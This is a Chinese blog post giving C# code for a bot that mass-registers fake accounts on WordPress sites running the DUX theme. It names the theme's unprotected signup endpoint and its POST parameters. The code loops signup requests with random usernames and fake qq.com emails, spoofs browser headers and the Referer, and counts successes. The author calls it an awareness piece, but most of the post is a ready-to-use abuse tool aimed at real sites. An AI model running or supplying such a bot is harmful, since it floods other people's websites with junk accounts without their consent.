WordPress网站批量注册账号C#实现代码

和群里诸位站长聊天时说到WordPress开放注册的问题,发现好多WordPress网站开放了注册,包括本站也开放了注册。虽然很多站看起来很高大上,注册弹窗漂亮异常。但是它们都没有对注册信息进行加密处理以及注册限制,留下了可以无限注册的接口。今天就用C#写一个简单的WordPress账号注册机,批量注册一个使用大前端主题dux的网站。大家不要学我,这个站长我认识,刷人家账号是不好的行为哟~

WordPress网站批量注册账号C#实现代码

WordPress网站批量注册账号C#实现代码

首先是使用浏览器进行抓包,chrome内核浏览器可以F12直接抓包,IE需要安装httpwatch软件。具体抓包过程我就不教大家了,很简单,特别是这种没有加密处理的明文信息。下面是dux主题的注册接口:

请求方式:post

请求地址:域名/wp-content/themes/dux/action/log.php

请求参数:

  • name(用户名)
  • email(用户邮箱)
  • action(请求类型,用以判断是否是注册请求),注册请求action 为signup

下面看看C#批量账号注册机的代码实现:

生成随机字母数字的方法,以便我们随机构造邮箱地址。

/// <summary>
/// 生成随机字母与数字
/// </summary>
/// <param name="IntStr">生成长度</param>
/// <returns></returns>
public static string Str(int Length)
{
    return Str(Length, false);
}
/// <summary>
/// 生成随机字母与数字
/// </summary>
/// <param name="Length">生成长度</param>
/// <param name="Sleep">是否要在生成前将当前线程阻止以避免重复</param>
/// <returns></returns>
public static string Str(int Length, bool Sleep)
{
    if (Sleep)
        System.Threading.Thread.Sleep(3);
    char[] Pattern = new char[] { '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z' };
    string result = "";
    int n = Pattern.Length;
    System.Random random = new Random(~unchecked((int)DateTime.Now.Ticks));
    for (int i = 0; i < Length; i++)
    {
        int rnd = random.Next(0, n);
        result += Pattern[rnd];
    }
    return result;
}

然后是使用HttpWebRequest方法提交post请求,前面已经讲过了,不清楚看这里,C#从WebBrowser中取得Cookie 并在 HttpWebRequest中使用

 public void threadres() {
            int i = 0;
            while (i < Convert.ToInt32(textBox4.Text))
            {
                HttpWebRequest request = (HttpWebRequest)WebRequest.Create(textBox3.Text);
                //以下是发送的http头,随便加,其中referer挺重要的,有些网站会根据这个来反盗链
                request.Referer = textBox2.Text;
                request.Accept = "Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
                request.Headers["Accept-Language"] = "zh-CN,zh;q=0.";
                request.Headers["Accept-Charset"] = "GBK,utf-8;q=0.7,*;q=0.3";
                request.UserAgent = "User-Agent:Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1";
                request.KeepAlive = true;
                //上面的http头看情况而定,但是下面俩必须加
                request.ContentType = "application/x-www-form-urlencoded";
                request.Method = "POST";

                Encoding encoding = Encoding.UTF8;//根据网站的编码自定义
                string postDataStr = "name=" + Str(10) + "&email=" + Str(10) + "@qq.com&action=signup";
                byte[] postData = encoding.GetBytes(postDataStr);
                request.ContentLength = postData.Length;
                Stream requestStream = request.GetRequestStream();
                requestStream.Write(postData, 0, postData.Length);

                HttpWebResponse response = (HttpWebResponse)request.GetResponse();
                Stream responseStream = response.GetResponseStream();
                //如果http头中接受gzip的话,这里就要判断是否为有压缩,有的话,直接解压缩即可
                if (response.Headers["Content-Encoding"] != null && response.Headers["Content-Encoding"].ToLower().Contains("gzip"))
                {
                    responseStream = new GZipStream(responseStream, CompressionMode.Decompress);
                }

                StreamReader streamReader = new StreamReader(responseStream, encoding);
                string retString = streamReader.ReadToEnd();
                settext settx = new settext(updateui);
                Invoke(settx, retString);
                
                streamReader.Close();
                responseStream.Close();
                i++;
                System.Threading.Thread.Sleep(400);
            }
        }

因为是批量注册,为了不影响UI,使用了线程委托来实现。dux注册返回的是json,c#的json解析比较麻烦,我就不解析了,直接判断第10个字符是数字几就行了,0表示成功。

 thread = new Thread(new ThreadStart(threadres));
 thread.IsBackground = true;
 thread.Start();

用上面的代码启动线程即可。。。好像忘了个委托

public delegate void settext(String str);//定义一个用于更新UI的委托,需要传入一个字符串参数

委托ui处理方法

 public void updateui(String str) {
            j++;
            if(str.Substring(9, 1).Equals("0")) {
                textBox1.Text = textBox1.Text + "/r/n "+j+" 注册成功";
            }
            
        }

搞定,在程序界面填入注册接口地址即可,如果不成功,填入来源地址一般就OK了。这篇文章主要是为了提高诸位站长的运维意识,虽然刷账号没用,后台点几下鼠标就能把所有不合格账号全部删除,但….要提高自己。

原创文章,作者:奋斗,如若转载,请注明出处:https://blog.ytso.com/241316.html

(0)
上一篇 2022年4月7日 00:31
下一篇 2022年4月7日

相关推荐

发表回复

登录后才能评论